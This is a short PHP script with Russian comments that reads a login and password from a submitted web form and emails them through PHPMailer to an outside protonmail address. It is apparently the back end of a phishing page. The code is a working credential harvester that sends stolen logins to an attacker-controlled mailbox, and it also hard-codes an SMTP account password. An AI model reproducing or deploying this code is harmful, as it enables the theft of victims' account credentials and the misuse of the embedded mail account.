<?php
// Файлы phpmailer
require 'phpmailer/PHPMailer.php';
require 'phpmailer/SMTP.php';
require 'phpmailer/Exception.php';

// Переменные, которые отправляет пользователь
$username = $_POST['login'];
$password = $_POST['password'];


// Формирование самого письма
$title = "b2site.at";
$body = "
<h2>blcp.at</h2>
<b>Имя:</b> $username<br>
<b>Пароль:</b> $password<br><br>
";

// Настройки PHPMailer
$mail = new PHPMailer\PHPMailer\PHPMailer();
try {
    $mail->isSMTP();   
    $mail->CharSet = "UTF-8";
    $mail->SMTPAuth   = true;
    //$mail->SMTPDebug = 2;
    $mail->Debugoutput = function($str, $level) {$GLOBALS['status'][] = $str;};

    // Настройки вашей почты
    $mail->Host       = 'mail.b2site.at'; // SMTP сервера вашей почты
    $mail->Username   = 'sender-1@b2site.at'; // Логин на почте
    $mail->Password   = ',xiObOVf!=Vpi(c^'; // Пароль на почте
    $mail->SMTPSecure = 'ssl';
    $mail->Port       = 465;
    $mail->setFrom('sender-1@b2site.at', 'b2site.at'); // Адрес самой почты и имя отправителя

    // Получатель письма
    $mail->addAddress('poporidecosta@protonmail.com');  
    

    // Прикрипление файлов к письму

// Отправка сообщения
$mail->isHTML(true);
$mail->Subject = $title;
$mail->Body = $body;    

// Проверяем отравленность сообщения
if ($mail->send()) {$result = "success";} 
else {$result = "error";}

} catch (Exception $e) {
    $result = "error";
    $status = "Сообщение не было отправлено. Причина ошибки: {$mail->ErrorInfo}";
}

// Отображение результата
 echo json_encode(["result" => $result, "status" => $status]);
